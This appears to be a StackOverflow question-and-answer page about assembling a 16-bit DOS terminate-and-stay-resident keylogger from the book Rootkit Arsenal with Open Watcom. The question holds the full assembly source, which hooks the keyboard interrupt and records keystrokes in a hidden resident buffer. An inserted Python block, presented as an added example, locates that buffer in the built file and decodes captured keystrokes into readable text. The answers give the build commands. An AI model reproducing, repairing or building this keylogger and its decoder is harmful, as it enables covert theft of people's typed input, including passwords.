Question

I am trying to compile a 16-bit assembly code snippet from the book Rootkit Arsenal in the Open Watcom IDE. It gives the error "multiple starting addresses found". Having a very limited amount of assembly knowledge, I have not been able to sort it out. This is the code:

CSEG SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CSEG,DS:CSEG,SS:CSEG
ORG 100H                      ; .COM image: code starts right after the 256-byte PSP

_here:
    JMP _main                 ; entry point (see END _here below)
    JMP _overData

; Resident data. _buffer is pre-filled with 'W' so unused space stands out in a dump.
_buffer     DB 512 DUP('W')
_terminator DB 'Z'
_index      DW 0H             ; number of bytes logged so far
_oldISR     DD 0H             ; original INT 9 (keyboard hardware) vector
_chkISR     DD 0h             ; original INT 16h (BIOS keyboard services) vector
_overData:

; INT 0BBh (187) handler: lets a reader program locate the buffer.
; Returns DX:DI = segment:offset of _buffer.
_getBufferAddr:
    STI
    MOV DX, CS
    LEA DI,_buffer
    IRET

; Replacement INT 9 handler: chain to the BIOS handler first, then peek the
; keystroke it queued with INT 16h/AH=01h and append AL to _buffer.
_hookBIOS:
    PUSH AX
    PUSH BX

    PUSHF                     ; PUSHF + far CALL simulates the INT frame the BIOS handler expects
    CALL CS:_oldISR

    MOV AH, 01H               ; INT 16h/AH=01h: ZF=1 if no key waiting, else AL=ASCII, AH=scan code
    PUSHF
    CALL CS:_chkISR           ; peek only: the key stays queued, so the foreground program still gets it

    CLI
    PUSH DS                   ; CLI/PUSH/POP do not touch ZF, so the test below still sees INT 16h's result
    PUSH CS
    POP DS

    jz _hb_Exit
    LEA BX,_buffer
    PUSH SI
    MOV SI,WORD PTR[_index]
    CMP SI,512                ; stop once _buffer is full; without this check the writes run past
    JAE _hb_Full              ; _terminator, _index and the saved vectors and crash the machine
    MOV DS:[BX+SI],AL
    INC SI
    MOV WORD PTR[_index], SI
_hb_Full:
    POP SI

_hb_Exit:
    POP DS
    POP BX                    ; pops must mirror the pushes above (BX was pushed last)
    POP AX
    STI
    IRET

; Hook installation through DOS: AH=35h reads a vector into ES:BX, AH=25h sets one from DS:DX.
_install:
    LEA DX,_getBufferAddr
    MOV CX,CS
    MOV DS,CX
    MOV AH,25H
    MOV AL,187                ; INT 0BBh -> _getBufferAddr
    INT 21H

    MOV AH,35H
    MOV AL,9H                 ; save the original INT 9 vector
    INT 21H
    MOV WORD PTR _oldISR[0],BX
    MOV WORD PTR _oldISR[2],ES

    MOV AH, 35H
    MOV AL,16H                ; save the original INT 16h vector
    INT 21H
    MOV WORD PTR _chkISR[0],BX
    MOV WORD PTR _chkISR[2],ES

    MOV AH,25H
    MOV AL,9H                 ; INT 9 -> _hookBIOS
    MOV CX,CS
    MOV DS,CX
    LEA DX,_hookBIOS
    INT 21H

    RET

PUBLIC _main

_main:
    PUSH BP
    MOV BP,SP
    LEA AX,_localStk
    ADD AX,100H               ; AX = top of the private 256-byte stack
    MOV BX,CS
    MOV SS,BX                 ; MOV SS holds interrupts off for exactly one instruction,
    MOV SP,AX                 ; so SP is loaded right after it (the original computed AX but never set SP)

    CALL NEAR PTR _install

    MOV AH, 31H               ; terminate and stay resident
    MOV AL,0                  ; exit code 0
    MOV DX, 200H              ; keep 200h paragraphs (8 KiB): PSP, code, buffer and stack all fit
    INT 21H

    POP BP                    ; never reached: INT 21h/AH=31h does not return
    RET

PUBLIC _localStk
_localStk DB 256 DUP(?)

CSEG ENDS
END _here

Kindly, help me out.
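Two checks a practitioner would want on the listing above, written here as an added example in Python (this is not code from the book or from the question): given the bytes of the built .COM, find _buffer from its 'W'-fill and 'Z' terminator and compute the smallest paragraph count the INT 21h/AH=31h call needs, so the MOV DX,200H can be compared against the real image size; and render a dump of _buffer as readable keystrokes, since each logged byte is the AL value INT 16h/AH=01h returned. The sample image and dump are constructed inline; the data layout it searches for is taken from the listing's declarations.

```python
"""Inspect the TSR keylogger built from the listing above.

Added example: this is not code from the book or from the question. It
assumes the listing is assembled as a tiny-model .COM (ORG 100h) with the
resident data exactly as written there: a 512-byte buffer pre-filled with
'W', a one-byte 'Z' terminator, then the WORD _index and two DWORD vectors.
"""
from dataclasses import dataclass

BUFFER_FILL = ord("W")
BUFFER_SIZE = 512
TERMINATOR = ord("Z")
PSP_SIZE = 0x100                    # a .COM image is loaded at CS:0100h, after the PSP
REQUESTED_PARAGRAPHS = 0x200        # the MOV DX,200H before INT 21h/AH=31h in the listing


@dataclass
class ComLayout:
    entry_jmp_ok: bool          # first instruction is a JMP (E9 rel16 or EB rel8)
    buffer_offset: int          # file offset of _buffer (add 0x100 for the CS offset)
    index_offset: int           # file offset of _index
    needed_paragraphs: int      # smallest DX that keeps the whole image resident
    requested_paragraphs: int


def locate_buffer(image: bytes) -> int:
    """Return the file offset of _buffer: 512 x 'W' immediately followed by 'Z'."""
    needle = bytes([BUFFER_FILL]) * BUFFER_SIZE + bytes([TERMINATOR])
    off = image.find(needle)
    if off < 0:
        raise ValueError("no 512-byte 'W' buffer followed by 'Z' in image")
    return off


def resident_paragraphs(image_len: int) -> int:
    """INT 21h/AH=31h keeps DX 16-byte paragraphs counted from the start of the PSP."""
    return -(-(PSP_SIZE + image_len) // 16)   # ceiling division


def analyze_com(image: bytes) -> ComLayout:
    """Sanity-check a built .COM against the listing's assumptions."""
    buf = locate_buffer(image)
    return ComLayout(
        entry_jmp_ok=len(image) >= 3 and image[0] in (0xE9, 0xEB),
        buffer_offset=buf,
        index_offset=buf + BUFFER_SIZE + 1,        # _index follows _terminator
        needed_paragraphs=resident_paragraphs(len(image)),
        requested_paragraphs=REQUESTED_PARAGRAPHS,
    )


def decode_captured(buffer_dump: bytes, index: int) -> str:
    """Render the logged bytes: each one is AL as returned by INT 16h/AH=01h.

    AL is the ASCII code, so Enter arrives as 0Dh and an extended key (arrows,
    function keys) as 00h with the scan code in AH, which the hook never stores.
    An index above BUFFER_SIZE means the unchecked INC SI in the original listing
    overran _buffer; only the buffer itself can be decoded, so the index is clamped.
    """
    out = []
    for b in buffer_dump[:min(index, BUFFER_SIZE)]:
        if b == 0x0D:
            out.append("\n")
        elif b == 0x08:
            out.append("<BS>")
        elif b == 0x00:
            out.append("<EXT>")
        elif 0x20 <= b < 0x7F:
            out.append(chr(b))
        else:
            out.append(f"<{b:02X}>")
    return "".join(out)


# Constructed sample image (not a real build): two near JMPs, the data block,
# then 64 NOPs standing in for the handlers. A real build is a few hundred bytes longer.
SAMPLE_IMAGE = (
    b"\xE9\x00\x00" + b"\xE9\x00\x00"
    + b"W" * BUFFER_SIZE + b"Z" + b"\x00\x00" + b"\x00" * 8
    + b"\x90" * 64
)

# Constructed buffer dump: the user typed "dir", Enter, then an arrow key.
SAMPLE_DUMP = b"dir\r\x00" + b"W" * (BUFFER_SIZE - 5)
SAMPLE_INDEX = 5

if __name__ == "__main__":
    layout = analyze_com(SAMPLE_IMAGE)
    print(layout)
    print(repr(decode_captured(SAMPLE_DUMP, SAMPLE_INDEX)))
```

Run it against the real build by replacing SAMPLE_IMAGE with the bytes of the .COM; if needed_paragraphs ever exceeds requested_paragraphs, DOS would free memory that the handlers still execute from. A dump taken from a machine running the listing as posted can carry an _index past 512, which is the overrun the decoder's clamp is there for.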


The solution

Sorry for the late reply, but I just figured this out and posted a solution on another StackOverflow question about a similar problem:

Compiling real mode asm (rootkit.arsenal)

Other tips

What I do to build .com files with OpenWatcom is to compile the assembly file with wasm and then use wlink.

wasm hello.asm
wlink sys dos com file hello.o

Here the object file has the extension .o, which is what wasm produces on Linux. In DOS, Windows and OS/2 it will probably be .obj, so adjust the command line as appropriate for your system.

I use .model tiny and .286p at the start and leave out the CSEG and ASSUME lines. I suppose that doesn't matter, though.

Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow